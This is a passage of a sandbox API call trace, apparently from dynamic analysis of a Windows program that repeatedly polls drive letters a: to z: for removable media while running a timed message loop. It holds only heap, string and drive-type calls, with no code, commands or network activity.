hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.577] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.577] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.577] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0217.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.578] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.578] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.578] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.578] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.578] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.579] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.580] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.581] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.582] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.582] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.582] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.582] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.583] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.583] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.583] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.583] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.583] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e60 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e60 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0217.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0217.584] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.585] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0217.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0217.585] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.585] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd358 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0217.585] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0217.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.586] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.586] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.586] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.587] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.587] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.587] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.587] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.588] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.589] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.589] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.589] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.589] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.659] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.659] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.660] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.660] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.661] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.661] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.661] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.661] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.661] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.662] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.662] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.662] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.663] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.663] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.663] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.663] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.663] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.663] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.663] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.663] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0217.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0217.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.664] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.664] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0217.664] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0217.664] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.664] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.665] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0217.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.665] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.665] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.665] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.665] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.665] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.666] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.666] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.666] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.666] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.666] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.666] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.666] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.667] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.667] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.667] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.667] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.667] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.668] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.668] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.668] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.668] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.669] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.669] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.669] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.669] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.670] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.670] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.670] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.670] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.671] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.671] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.671] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.671] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.671] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.671] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.672] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.672] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.672] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.672] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.672] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.672] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.672] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e40 [0217.672] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.673] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.673] HeapFree (in: 